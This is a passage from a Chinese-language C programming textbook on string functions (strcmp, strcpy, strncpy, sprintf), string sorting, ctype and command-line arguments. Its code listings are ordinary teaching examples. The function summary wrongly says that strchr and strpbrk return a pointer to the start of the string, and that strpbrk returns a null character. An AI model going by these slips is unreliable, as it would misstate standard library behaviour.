{ char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { 792 while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 下面是该程序的运行示例: What is your favorite flower? Rose Roses smell like old shoes. What is your favorite bug? Aphid Aphids smell 读者可能已经注意到,strcat()和 gets()类似,也会导致缓冲区溢出。为 什么 C11 标准不废弃strcat(),只留下strncat()?为何对gets()那么残忍?这也 许是因为gets()造成的安全隐患来自于使用该程序的人,而strcat()暴露的问 793 题是那些粗心的程序员造成的。无法控制用户会进行什么操作,但是,可以 控制你的程序做什么。C语言相信程序员,因此程序员有责任确保strcat()的 使用安全。 11.5.4 strcmp()函数 假设要把用户的响应与已储存的字符串作比较,如程序清单11.20所 示。 程序清单11.20 nogo.c程序 /* nogo.c -- 该程序是否能正常运行? */ #include <stdio.h> #define ANSWER "Grant" #define SIZE 40 char * s_gets(char * st, int n); int main(void) { char try[SIZE]; puts("Who is buried in Grant's tomb?"); s_gets(try, SIZE); while (try != ANSWER) { puts("No, that's wrong. Try again."); 794 s_gets(try, SIZE); } puts("That's right!"); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; 795 } return ret_val; } 这个程序看上去没问题,但是运行后却不对劲。ANSWER和try都是指 针,所以try != ANSWER检查的不是两个字符串是否相等,而是这两个字符 串的地址是否相同。因为ANSWE和try储存在不同的位置,所以这两个地址 不可能相同,因此,无论用户输入什么,程序都提示输入不正确。这真让人 沮丧。 该函数要比较的是字符串的内容,不是字符串的地址。读者可以自己设 计一个函数,也可以使用C标准库中的strcmp()函数(用于字符串比较)。该 函数通过比较运算符来比较字符串,就像比较数字一样。如果两个字符串参 数相同,该函数就返回0,否则返回非零值。修改后的版本如程序清单11.21 所示。 程序清单11.21 compare.c程序 /* compare.c -- 该程序可以正常运行 */ #include <stdio.h> #include <string.h>  // strcmp()函数的原型在该头文件中 #define ANSWER "Grant" #define SIZE 40 char * s_gets(char * st, int n); int main(void) { 796 char try[SIZE]; puts("Who is buried in Grant's tomb?"); s_gets(try, SIZE); while (strcmp(try, ANSWER) != 0) { puts("No, that's wrong. Try again."); s_gets(try, SIZE); } puts("That's right!"); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') 797 i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 注意 由于非零值都为“真”,所以许多经验丰富的C程序员会把该例main()中 的while循环头写成:while (strcmp(try, ANSWER)) strcmp()函数比较的是字符串,不是整个数组,这是非常好的功能。虽 然数组try占用了40字节,而储存在其中的"Grant"只占用了6字节(还有一个 用来放空字符),strcmp()函数只会比较try中第1个空字符前面的部分。所 以,可以用strcmp()比较储存在不同大小数组中的字符串。 如果用户输入GRANT、grant或Ulysses S.Grant会怎样?程序会告知用户 输入错误。希望程序更友好,必须把所有正确答案的可能性包含其中。这里 可以使用一些小技巧。例如,可以使用#define定义类似GRANT这样的答 案,并编写一个函数把输入的内容都转换成小写,就解决了大小写的问题。 但是,还要考虑一些其他错误的形式,这些留给读者完成。 1.strcmp()的返回值 798 如果strcmp()比较的字符串不同,它会返回什么值?请看程序清单11.22 的程序示例。 程序清单11.22 compback.c程序 /* compback.c -- strcmp()的返回值 */ #include <stdio.h> #include <string.h> int main(void) { printf("strcmp(\"A\", \"A\") is "); printf("%d\n", strcmp("A", "A")); printf("strcmp(\"A\", \"B\") is "); printf("%d\n", strcmp("A", "B")); printf("strcmp(\"B\", \"A\") is "); printf("%d\n", strcmp("B", "A")); printf("strcmp(\"C\", \"A\") is "); printf("%d\n", strcmp("C", "A")); printf("strcmp(\"Z\", \"a\") is "); printf("%d\n", strcmp("Z", "a")); printf("strcmp(\"apples\", \"apple\") is "); 799 printf("%d\n", strcmp("apples", "apple")); return 0; } 在我们的系统中运行该程序,输出如下: strcmp("A", "A") is 0 strcmp("A", "B") is -1 strcmp("B", "A") is 1 strcmp("C", "A") is 1 strcmp("Z", "a") is -1 strcmp("apples", "apple") is 1 strcmp()比较"A"和本身,返回0;比较"A"和"B",返回-1;比 较"B"和"A",返回1。这说明,如果在字母表中第1个字符串位于第2个字符 串前面,strcmp()中就返回负数;反之,strcmp()则返回正数。所以, strcmp()比较"C"和"A",返回1。其他系统可能返回2,即两者的ASCII码之 差。ASCII标准规定,在字母表中,如果第1个字符串在第2个字符串前面, strcmp()返回一个负数;如果两个字符串相同,strcmp()返回0;如果第1个字 符串在第2个字符串后面,strcmp()返回正数。然而,返回的具体值取决于实 现。例如,下面给出在不同实现中的输出,该实现返回两个字符的差值: strcmp("A", "A") is 0 strcmp("A", "B") is -1 strcmp("B", "A") is 1 strcmp("C", "A") is 2 800 strcmp("Z", "a") is -7 strcmp("apples", "apple") is 115 如果两个字符串开始的几个字符都相同会怎样?一般而言,strcmp()会 依次比较每个字符,直到发现第 1 对不同的字符为止。然后,返回相应的 值。例如,在上面的最后一个例子中,"apples"和"apple"只有最后一对字符 不同("apples"的s和"apple"的空字符)。由于空字符在ASCII中排第1。字符 s一定在它后面,所以strcmp()返回一个正数。 最后一个例子表明,strcmp()比较所有的字符,不只是字母。所以,与 其说该函数按字母顺序进行比较,不如说是按机器排序序列(machine collating sequence)进行比较,即根据字符的数值进行比较(通常都使用 ASCII值)。在ASCII中,大写字母在小写字母前面,所以strcmp("Z", "a")返 回的是负值。 大多数情况下,strcmp()返回的具体值并不重要,我们只在意该值是0还 是非0(即,比较的两个字符串是否相等)。或者按字母排序字符串,在这 种情况下,需要知道比较的结果是为正、为负还是为0。 注意 strcmp()函数比较的是字符串,不是字符,所以其参数应该是字符串 (如"apples"和"A"),而不是字符(如'A')。但是,char 类型实际上是整数 类型,所以可以使用关系运算符来比较字符。假设word是储存在char类型数 组中的字符串,ch是char类型的变量,下面的语句都有效: if (strcmp(word, "quit") == 0) // 使用strcmp()比较字符串 puts("Bye!"); if (ch == 'q') // 使用 == 比较字符 puts("Bye!"); 801 尽管如此,不要使用ch或'q'作为strcmp()的参数。 程序清单11.23用strcmp()函数检查程序是否要停止读取输入。 程序清单11.23 quit_chk.c程序 /* quit_chk.c -- 某程序的开始部分 */ #include <stdio.h> #include <string.h> #define SIZE 80 #define LIM 10 #define STOP "quit" char * s_gets(char * st, int n); int main(void) { char input[LIM][SIZE]; int ct = 0; printf("Enter up to %d lines (type quit to quit):\n", LIM); while (ct < LIM && s_gets(input[ct], SIZE) != NULL && strcmp(input[ct], STOP) != 0) { ct++; 802 } printf("%d strings entered\n", ct); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } 803 return ret_val; } 该程序在读到EOF字符(这种情况下s_gets()返回NULL)、用户输入quit 或输入项达到LIM时退出。 顺带一提,有时输入空行(即,只按下Enter键或Return键)表示结束输 入更方便。为实现这一功能,只需修改一下while循环的条件即可: while (ct < LIM && s_gets(input[ct], SIZE) != NULL&& input[ct][0] != '\0') 这里,input[ct]是刚输入的字符串,input[ct][0]是该字符串的第1个字 符。如果用户输入空行, s_gets()便会把该行第1个字符(换行符)替换成空 字符。所以,下面的表达式用于检测空行: input[ct][0] != '\0' 2.strncmp()函数 strcmp()函数比较字符串中的字符,直到发现不同的字符为止,这一过 程可能会持续到字符串的末尾。而strncmp()函数在比较两个字符串时,可以 比较到字符不同的地方,也可以只比较第3个参数指定的字符数。例如,要 查找以"astro"开头的字符串,可以限定函数只查找这5 个字符。程序清单 11.24 演示了该函数的用法。 程序清单11.24 starsrch.c程序 /* starsrch.c -- 使用 strncmp() */ #include <stdio.h> #include <string.h> #define LISTSIZE 6 804 int main() { const char * list[LISTSIZE] = { "astronomy", "astounding", "astrophysics", "ostracize", "asterism", "astrophobia" }; int count = 0; int i; for (i = 0; i < LISTSIZE; i++) if (strncmp(list[i], "astro", 5) == 0) { printf("Found: %s\n", list[i]); count++; } printf("The list contained %d words beginning" " with astro.\n", count); return 0; 805 } 下面是该程序的输出: Found: astronomy Found: astrophysics Found: astrophobia The list contained 3 words beginning with astro. 11.5.5 strcpy()和strncpy()函数 前面提到过,如果pts1和pts2都是指向字符串的指针,那么下面语句拷 贝的是字符串的地址而不是字符串本身: pts2 = pts1; 如果希望拷贝整个字符串,要使用strcpy()函数。程序清单11.25要求用 户输入以q开头的单词。该程序把输入拷贝至一个临时数组中,如果第1 个 字母是q,程序调用strcpy()把整个字符串从临时数组拷贝至目标数组中。 strcpy()函数相当于字符串赋值运算符。 程序清单11.25 copy1.c程序 /* copy1.c -- 演示 strcpy() */ #include <stdio.h> #include <string.h> // strcpy()的原型在该头文件中 #define SIZE 40 #define LIM 5 806 char * s_gets(char * st, int n); int main(void) { char qwords[LIM][SIZE]; char temp[SIZE]; int i = 0; printf("Enter %d words beginning with q:\n", LIM); while (i < LIM && s_gets(temp, SIZE)) { if (temp[0] != 'q') printf("%s doesn't begin with q!\n", temp); else { strcpy(qwords[i], temp); i++; } } puts("Here are the words accepted:"); for (i = 0; i < LIM; i++) 807 puts(qwords[i]); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; 808 } 下面是该程序的运行示例: Enter 5 words beginning with q: quackery quasar quilt quotient no more no more doesn't begin with q! quiz Here are the words accepted: quackery quasar quilt quotient quiz 注意,只有在输入以q开头的单词后才会递增计数器i,而且该程序通过 比较字符进行判断: if (temp[0] != 'q') 809 这行代码的意思是:temp中的第1个字符是否是q?当然,也可以通过比 较字符串进行判断: if (strncmp(temp, "q", 1) != 0) 这行代码的意思是:temp字符串和"q"的第1个元素是否相等? 请注意,strcpy()第2个参数(temp)指向的字符串被拷贝至第1个参数 (qword[i])指向的数组中。拷贝出来的字符串被称为目标字符串,最初的 字符串被称为源字符串。参考赋值表达式语句,很容易记住strcpy()参数的 顺序,即第1个是目标字符串,第2个是源字符串。 char target[20]; int x; x = 50;          /* 数字赋值*/ strcpy(target, "Hi ho!"); /* 字符串赋值*/ target = "So long";    /* 语法错误 */程序员有责任确保目标数组有 足够的空间容纳源字符串的副本。下面的代码有点问题: char * str; strcpy(str, "The C of Tranquility");   // 有问题 strcpy()把"The C of Tranquility"拷贝至str指向的地址上,但是str未被初始 化,所以该字符串可能被拷贝到任意的地方! 总之,strcpy()接受两个字符串指针作为参数,可以把指向源字符串的 第2个指针声明为指针、数组名或字符串常量;而指向源字符串副本的第1个 指针应指向一个数据对象(如,数组),且该对象有足够的空间储存源字符 串的副本。记住,声明数组将分配储存数据的空间,而声明指针只分配储存 一个地址的空间。 810 1.strcpy()的其他属性 strcpy()函数还有两个有用的属性。第一,strcpy()的返回类型是 char *, 该函数返回的是第 1个参数的值,即一个字符的地址。第二,第 1 个参数不 必指向数组的开始。这个属性可用于拷贝数组的一部分。程序清单11.26演 示了该函数的这两个属性。 程序清单11.26 copy2.c程序 /* copy2.c -- 使用 strcpy() */ #include <stdio.h> #include <string.h>  // 提供strcpy()的函数原型 #define WORDS  "beast" #define SIZE 40 int main(void) { const char * orig = WORDS; char copy[SIZE] = "Be the best that you can be."; char * ps; puts(orig); puts(copy); ps = strcpy(copy + 7, orig); puts(copy); 811 puts(ps); return 0; } 下面是该程序的输出: beast Be the best that you can be. Be the beast beast 注意,strcpy()把源字符串中的空字符也拷贝在内。在该例中,空字符 覆盖了copy数组中that的第1个t(见图11.5)。注意,由于第1个参数是copy + 7,所以ps指向copy中的第8个元素(下标为7)。因此puts(ps)从该处开始打 印字符串。 图11.5 使用指针strcpy()函数 812 2.更谨慎的选择:strncpy() strcpy()和 strcat()都有同样的问题,它们都不能检查目标空间是否能容 纳源字符串的副本。拷贝字符串用 strncpy()更安全,该函数的第 3 个参数指 明可拷贝的最大字符数。程序清单 11.27 用strncpy()代替程序清单11.25中的 strcpy()。为了演示目标空间装不下源字符串的副本会发生什么情况,该程 序使用了一个相当小的目标字符串(共7个元素,包含6个字符)。 程序清单11.27 copy3.c程序 /* copy3.c -- 使用strncpy() */ #include <stdio.h> #include <string.h>  /* 提供strncpy()的函数原型*/ #define SIZE 40 #define TARGSIZE 7 #define LIM 5 char * s_gets(char * st, int n); int main(void) { char qwords[LIM][TARGSIZE]; char temp[SIZE]; int i = 0; printf("Enter %d words beginning with q:\n", LIM); 813 while (i < LIM && s_gets(temp, SIZE)) { if (temp[0] != 'q') printf("%s doesn't begin with q!\n", temp); else { strncpy(qwords[i], temp, TARGSIZE - 1); qwords[i][TARGSIZE - 1] = '\0'; i++; } } puts("Here are the words accepted:"); for (i = 0; i < LIM; i++) puts(qwords[i]); return 0; } char * s_gets(char * st, int n) { char * ret_val; 814 int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 下面是该程序的运行示例: Enter 5 words beginning with q: quack quadratic quisling 815 quota quagga Here are the words accepted: quack quadra quisli quota quagga strncpy(target, source, n)把source中的n个字符或空字符之前的字符(先满 足哪个条件就拷贝到何处)拷贝至target中。因此,如果source中的字符数小 于n,则拷贝整个字符串,包括空字符。但是,strncpy()拷贝字符串的长度不 会超过n,如果拷贝到第n个字符时还未拷贝完整个源字符串,就不会拷贝空 字符。所以,拷贝的副本中不一定有空字符。鉴于此,该程序把 n 设置为比 目标数组大小少1(TARGSIZE-1),然后把数组最后一个元素设置为空字 符: strncpy(qwords[i], temp, TARGSIZE - 1); qwords[i][TARGSIZE - 1] = '\0'; 这样做确保储存的是一个字符串。如果目标空间能容纳源字符串的副 本,那么从源字符串拷贝的空字符便是该副本的结尾;如果目标空间装不下 副本,则把副本最后一个元素设置为空字符。 11.5.6 sprintf()函数 sprintf()函数声明在stdio.h中,而不是在string.h中。该函数和printf()类 816 似,但是它是把数据写入字符串,而不是打印在显示器上。因此,该函数可 以把多个元素组合成一个字符串。sprintf()的第1个参数是目标字符串的地 址。其余参数和printf()相同,即格式字符串和待写入项的列表。 程序清单11.28中的程序用printf()把3个项(两个字符串和一个数字)组 合成一个字符串。注意, sprintf()的用法和printf()相同,只不过sprintf()把组 合后的字符串储存在数组formal中而不是显示在屏幕上。 程序清单11.28 format.c程序 /* format.c -- 格式化字符串 */ #include <stdio.h> #define MAX 20 char * s_gets(char * st, int n); int main(void) { char first[MAX]; char last[MAX]; char formal[2 * MAX + 10]; double prize; puts("Enter your first name:"); s_gets(first, MAX); puts("Enter your last name:"); 817 s_gets(last, MAX); puts("Enter your prize money:"); scanf("%lf", &prize); sprintf(formal, "%s, %-19s: $%6.2f\n", last, first, prize); puts(formal); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else 818 while (getchar() != '\n') continue; } return ret_val; } 下面是该程序的运行示例: Enter your first name: Annie Enter your last name: von Wurstkasse Enter your prize money: 25000 von Wurstkasse, Annie        : $25000.00 sprintf()函数获取输入,并将其格式化为标准形式,然后把格式化后的 字符串储存在formal中。 11.5.7 其他字符串函数 ANSI C库有20多个用于处理字符串的函数,下面总结了一些常用的函 数。 char *strcpy(char * restrict s1, const char * restrict s2); 该函数把s2指向的字符串(包括空字符)拷贝至s1指向的位置,返回值 819 是s1。 char *strncpy(char * restrict s1, const char * restrict s2, size_t n); 该函数把s2指向的字符串拷贝至s1指向的位置,拷贝的字符数不超过 n,其返回值是s1。该函数不会拷贝空字符后面的字符,如果源字符串的字 符少于n个,目标字符串就以拷贝的空字符结尾;如果源字符串有n个或超过 n个字符,就不拷贝空字符。 char *strcat(char * restrict s1, const char * restrict s2); 该函数把s2指向的字符串拷贝至s1指向的字符串末尾。s2字符串的第1 个字符将覆盖s1字符串末尾的空字符。该函数返回s1。 char *strncat(char * restrict s1, const char * restrict s2, size_t n); 该函数把s2字符串中的n个字符拷贝至s1字符串末尾。s2字符串的第1个 字符将覆盖s1字符串末尾的空字符。不会拷贝s2字符串中空字符和其后的字 符,并在拷贝字符的末尾添加一个空字符。该函数返回s1。 int strcmp(const char * s1, const char * s2); 如果s1字符串在机器排序序列中位于s2字符串的后面,该函数返回一个 正数;如果两个字符串相等,则返回0;如果s1字符串在机器排序序列中位 于s2字符串的前面,则返回一个负数。 int strncmp(const char * s1, const char * s2, size_t n); 该函数的作用和strcmp()类似,不同的是,该函数在比较n个字符后或遇 到第1个空字符时停止比较。 char *strchr(const char * s, int c); 如果s字符串中包含c字符,该函数返回指向s字符串首位置的指针(末 尾的空字符也是字符串的一部分,所以在查找范围内);如果在字符串s中 820 未找到c字符,该函数则返回空指针。 char *strpbrk(const char * s1, const char * s2);如果 s1 字符中包含 s2 字符 串中的任意字符,该函数返回指向 s1 字符串首位置的指针;如果在s1字符 串中未找到任何s2字符串中的字符,则返回空字符。 char *strrchr(const char * s, int c);该函数返回s字符串中c字符的最后一次 出现的位置(末尾的空字符也是字符串的一部分,所以在查找范围内)。如 果未找到c字符,则返回空指针。 char *strstr(const char * s1, const char * s2); 该函数返回指向s1字符串中s2字符串出现的首位置。如果在s1中没有找 到s2,则返回空指针。 size_t strlen(const char * s); 该函数返回s字符串中的字符数,不包括末尾的空字符。 请注意,那些使用const关键字的函数原型表明,函数不会更改字符 串。例如,下面的函数原型: char *strcpy(char * restrict s1, const char * restrict s2); 表明不能更改s2指向的字符串,至少不能在strcpy()函数中更改。但是可 以更改s1指向的字符串。这样做很合理,因为s1是目标字符串,要改变,而 s2是源字符串,不能更改。 关键字restrict将在第12章中介绍,该关键字限制了函数参数的用法。例 如,不能把字符串拷贝给本身。 第5章中讨论过,size_t类型是sizeof运算符返回的类型。C规定sizeof运 算符返回一个整数类型,但是并未指定是哪种整数类型,所以size_t在一个 系统中可以是unsigned int,而在另一个系统中可以是 unsigned long。string.h 头文件针对特定系统定义了 size_t,或者参考其他有 size_t定义的头文件。 821 前面提到过,参考资料V中列出了string.h系列的所有函数。除提供ANSI 标准要求的函数外,许多实现还提供一些其他函数。应查看你所使用的C实 现文档,了解可以使用哪些函数。 我们来看一下其中一个函数的简单用法。前面学过的fgets()读入一行输 入时,在目标字符串的末尾添加换行符。我们自定义的s_gets()函数通过 while循环检测换行符。其实,这里可以用strchr()代替s_gets()。首先,使用 strchr()查找换行符(如果有的话)。如果该函数发现了换行符,将返回该换 行符的地址,然后便可用空字符替换该位置上的换行符: char line[80]; char * find; fgets(line, 80, stdin); find = strchr(line, '\n'); // 查找换行符 if (find)           // 如果没找到换行符,返回NULL *find = '\0';     // 把该处的字符替换为空字符 如果strchr()未找到换行符,fgets()在达到行末尾之前就达到了它能读取 的最大字符数。可以像在s_gets()中那样,给if添加一个else来处理这种情 况。 接下来,我们看一个处理字符串的完整程序。 822 11.6 字符串示例:字符串排序 我们来处理一个按字母表顺序排序字符串的实际问题。准备名单表、创 建索引和许多其他情况下都会用到字符串排序。该程序主要是用 strcmp()函 数来确定两个字符串的顺序。一般的做法是读取字符串函数、排序字符串并 打印出来。之前,我们设计了一个读取字符串的方案,该程序就用到这个方 案。打印字符串没问题。程序使用标准的排序算法,稍后解释。我们使用了 一个小技巧,看看读者是否能明白。程序清单11.29演示了这个程序。 程序清单11.29 sort_str.c程序 /* sort_str.c -- 读入字符串,并排序字符串 */ #include <stdio.h> #include <string.h> #define SIZE 81    /* 限制字符串长度,包括 \0 */ #define LIM 20    /* 可读入的最多行数 */ #define HALT ""    /* 空字符串停止输入 */ void stsrt(char *strings [], int num); /* 字符串排序函数 */ char * s_gets(char * st, int n); int main(void) { char input[LIM][SIZE];   /* 储存输入的数组    */ char *ptstr[LIM];     /* 内含指针变量的数组  */ int ct = 0;        /* 输入计数      */ 823 int k;           /* 输出计数      */ printf("Input up to %d lines, and I will sort them.\n", LIM); printf("To stop, press the Enter key at a line's start.\n"); while (ct < LIM && s_gets(input[ct], SIZE) != NULL && input[ct][0] != '\0') { ptstr[ct] = input[ct]; /* 设置指针指向字符串  */ ct++; } stsrt(ptstr, ct);     /* 字符串排序函数    */ puts("\nHere's the sorted list:\n"); for (k = 0; k < ct; k++) puts(ptstr[k]);    /* 排序后的指针     */ return 0; } /* 字符串-指针-排序函数 */ void stsrt(char *strings [], int num) { char *temp; 824 int top, seek; for (top = 0; top < num - 1; top++) for (seek = top + 1; seek < num; seek++) if (strcmp(strings[top], strings[seek]) > 0) { temp = strings[top]; strings[top] = strings[seek]; strings[seek] = temp; } } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; 825 if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 我们用一首童谣来测试该程序: Input up to 20 lines, and I will sort them. To stop, press the Enter key at a line's start. O that I was where I would be, Then would I be where I am not; But where I am I must be, And where I would be I can not. Here's the sorted list: And where I would be I can not. But where I am I must be, O that I was where I would be, 826 Then would I be where I am not; 看来经过排序后,这首童谣的内容未受影响。 11.6.1 排序指针而非字符串 该程序的巧妙之处在于排序的是指向字符串的指针,而不是字符串本 身。我们来分析一下具体怎么做。最初,ptrst[0]被设置为input[0],ptrst[1] 被设置为input[1],以此类推。这意味着指针ptrst[i]指向数组input[i]的首字 符。每个input[i]都是一个内含81个元素的数组,每个ptrst[i]都是一个单独的 变量。排序过程把ptrst重新排列,并未改变input。例如,如果按字母顺序 input[1]在intput[0]前面,程序便交换指向它们的指针(即ptrst[0]指向input[1] 的开始,而ptrst[1]指向input[0]的开始)。这样做比用strcpy()交换两个input 字符串的内容简单得多,而且还保留了input数组中的原始顺序。图11.6从另 一个视角演示了这一过程。 827 图11.6 排序字符串指针 11.6.2 选择排序算法 我们采用选择排序算法(selection sort algorithm)来排序指针。具体做 法是,利用for循环依次把每个元素与首元素比较。如果待比较的元素在当 前首元素的前面,则交换两者。循环结束时,首元素包含的指针指向机器排 序序列最靠前的字符串。然后外层for循环重复这一过程,这次从input的第2 个元素开始。当内层循环执行完毕时,ptrst中的第2个元素指向排在第2的字 符串。这一过程持续到所有元素都已排序完毕。 828 现在来进一步分析选择排序的过程。下面是排序过程的伪代码: for n = 首元素至 n = 倒数第2个元素, 找出剩余元素中的最大值,并将其放在第n个元素中 具体过程如下。首先,从n = 0开始,遍历整个数组找出最大值元素,那 该元素与第1个元素交换;然后设置n = 1,遍历除第1个元素以外的其他元 素,在其余元素中找出最大值元素,把该元素与第2个元素交换;重复这一 过程直至倒数第 2 个元素为止。现在只剩下两个元素。比较这两个元素,把 较大者放在倒数第2的位置。这样,数组中的最小元素就在最后的位置上。 这看起来用for循环就能完成任务,但是我们还要更详细地分析“查找和 放置”的过程。在剩余项中查找最大值的方法是,比较数组剩余元素的第1个 元素和第2个元素。如果第2个元素比第1个元素大,交换两者。现在比较数 组剩余元素的第1个元素和第3个元素,如果第3个元素比较大,交换两者。 每次交换都把较大的元素移至顶部。继续这一过程直到比较第 1 个元素和最 后一个元素。比较完毕后,最大值元素现在是剩余数组的首元素。已经排出 了该数组的首元素,但是其他元素还是一团糟。下面是排序过程的伪代码: for n - 第2个元素至最后一个元素, 比较第n个元素与第1个元素,如果第n个元素更大,交换这两个元素的 值 看上去用一个for循环也能搞定。只不过要把它嵌套在刚才的for循环 中。外层循环指明正在处理数组的哪一个元素,内层循环找出应储存在该元 素的值。把这两部分伪代码结合起来,翻译成 C代码,就得到了程序清单 11.29中的stsrt()函数。顺带一提,C库中有一个更高级的排序函数:qsort()。 该函数使用一个指向函数的指针进行排序比较。第16章将给出该函数的用法 示例。 829 11.7 ctype.h字符函数和字符串 第7章中介绍了ctype.h系列与字符相关的函数。虽然这些函数不能处理 整个字符串,但是可以处理字符串中的字符。例如,程序清单11.30中定义 的ToUpper()函数,利用toupper()函数处理字符串中的每个字符,把整个字符 串转换成大写;定义的 PunctCount()函数,利用 ispunct()统计字符串中的标 点符号个数。另外,该程序使用strchr()处理fgets()读入字符串的换行符(如 果有的话)。 程序清单11.30 mod_str.c程序 /* mod_str.c -- 修改字符串 */ #include <stdio.h> #include <string.h> #include <ctype.h> #define LIMIT 81 void ToUpper(char *); int PunctCount(const char *); int main(void) { char line[LIMIT]; char * find; puts("Please enter a line:"); fgets(line, LIMIT, stdin); 830 find = strchr(line, '\n'); // 查找换行符 if (find)        // 如果地址不是 NULL, *find = '\0';     // 用空字符替换 ToUpper(line); puts(line); printf("That line has %d punctuation characters.\n",  PunctCount(line)); return 0; } void ToUpper(char * str) { while (*str) { *str = toupper(*str); str++; } } int PunctCount(const char * str) { 831 int ct = 0; while (*str) { if (ispunct(*str)) ct++; str++; } return ct; } while (*str)循环处理str指向的字符串中的每个字符,直至遇到空字符。 此时*str的值为0(空字符的编码值为0),即循环条件为假,循环结束。下 面是该程序的运行示例: Please enter a line: Me? You talkin' to me? Get outta here! ME? YOU TALKIN' TO ME? GET OUTTA HERE! That line has 4 punctuation characters. ToUpper()函数利用toupper()处理字符串中的每个字符(由于C区分大小 写,所以这是两个不同的函数名)。根据ANSI C中的定义,toupper()函数只 改变小写字符。但是一些很旧的C实现不会自动检查大小写,所以以前的代 码通常会这样写: if (islower(*str)) /* ANSI C之前的做法 -- 在转换大小写之前先检查 */ 832 *str = toupper(*str); 顺带一提,ctype.h中的函数通常作为宏(macro)来实现。这些C预处理 器宏的作用很像函数,但是两者有一些重要的区别。我们在第16章再讨论关 于宏的内容。 该程序使用 fgets()和 strchr()组合,读取一行输入并把换行符替换成空字 符。这种方法与使用s_gets()的区别是:s_gets()会处理输入行剩余字符(如 果有的话),为下一次输入做好准备。而本例只有一条输入语句,就没必要 进行多余的步骤。 833 11.8 命令行参数 在图形界面普及之前都使用命令行界面。DOS和UNIX就是例子。Linux 终端提供类UNIX命令行环境。命令行(command line)是在命令行环境中, 用户为运行程序输入命令的行。假设一个文件中有一个名为fuss的程序。在 UNIX环境中运行该程序的命令行是: $ fuss 或者在Windows命令提示模式下是: C> fuss 命令行参数(command-line argument)是同一行的附加项。如下例: $ fuss -r Ginger 一个C程序可以读取并使用这些附加项(见图11.7)。 程序清单11.27是一个典型的例子,该程序通过main()的参数读取这些附 加项。 834 图11.7 命令行参数 程序清单11.31 repeat.c程序 /* repeat.c -- 带参数的 main() */ #include <stdio.h> int main(int argc, char *argv []) { int count; printf("The command line has %d arguments:\n", argc - 1); for (count = 1; count < argc; count++) printf("%d: %s\n", count, argv[count]); 835 printf("\n"); return 0; } 把该程序编译为可执行文件repeat。下面是通过命令行运行该程序后的 输出: C>repeat Resistance is futile The command line has 3 arguments: 1: Resistance 2: is 3: futile 由此可见该程序为何名为repeat。下面我们解释一下它的运行原理。 C编译器允许main()没有参数或者有两个参数(一些实现允许main()有更 多参数,属于对标准的扩展)。main()有两个参数时,第1个参数是命令行 中的字符串数量。过去,这个int类型的参数被称为argc (表示参数计数 (argument count))。系统用空格表示一个字符串的结束和下一个字符串的开 始。因此,上面的repeat示例中包括命令名共有4个字符串,其中后3个供 repeat使用。该程序把命令行字符串储存在内存中,并把每个字符串的地址 储存在指针数组中。而该数组的地址则被储存在 main()的第 2 个参数中。按 照惯例,这个指向指针的指针称为argv(表示参数值[argument value])。如 果系统允许(一些操作系统不允许这样),就把程序本身的名称赋给 argv[0],然后把随后的第1个字符串赋给argv[1],以此类推。在我们的例子 中,有下面的关系: argv[0] 指向 repeat (对大部分系统而言) 836 argv[1] 指向Resistance argv[2] 指向is argv[3] 指向futile 程序清单11.31的程序通过一个for循环依次打印每个字符串。printf()中 的%s转换说明表明,要提供一个字符串的地址作为参数,而指针数组中的 每个元素(argv[0]、argv[1]等)都是这样的地址。 main()中的形参形式与其他带形参的函数相同。许多程序员用不同的形 式声明argv: int main(int argc, char **argv) char **argv与char *argv[]等价。也就是说,argv是一个指向指针的指 针,它所指向的指针指向 char。因此,即使在原始定义中,argv 也是指向指 针(该指针指向 char)的指针。两种形式都可以使用,但我们认为第1种形 式更清楚地表明argv表示一系列字符串。 顺带一提,许多环境(包括UNIX和DOS)都允许用双引号把多个单词 括起来形成一个参数。例如: repeat "I am hungry" now 这行命令把字符串"I am hungry"赋给argv[1],把"now"赋给argv[2]。 11.8.1 集成环境中的命令行参数 Windows集成环境(如Xcode、Microsoft Visual C++和Embarcadero C++ Builder)都不用命令行运行程序。有些环境中有项目对话框,为特定项目指 定命令行参数。其他环境中,可以在IDE中编译程序,然后打开MS-DOS窗 口在命令行模式中运行程序。但是,如果你的系统有一个运行命令行的编译 器(如GCC)会更简单。 837 11.8.2 Macintosh中的命令行参数 如果使用Xcode 4.6(或类似的版本),可以在Product菜单中选择 Scheme选项来提供命令行参数,编辑Scheme,运行。然后选择Argument标 签,在Launch的Arguments Pass中输入参数。 或者进入Mac的Terminal模式和UNIX的命令行环境。然后,可以找到程 序可执行代码的目录(UNIX的文件夹),或者下载命令行工具,使用gcc或 clang编译程序。 838 11.9 把字符串转换为数字 数字既能以字符串形式储存,也能以数值形式储存。把数字储存为字符 串就是储存数字字符。例如,数字213以'2'、'1'、'3'、'\0'的形式被储存在字 符串数组中。以数值形式储存213,储存的是int类型的值。 C要求用数值形式进行数值运算(如,加法和比较)。但是在屏幕上显 示数字则要求字符串形式,因为屏幕显示的是字符。printf()和 sprintf()函 数,通过%d 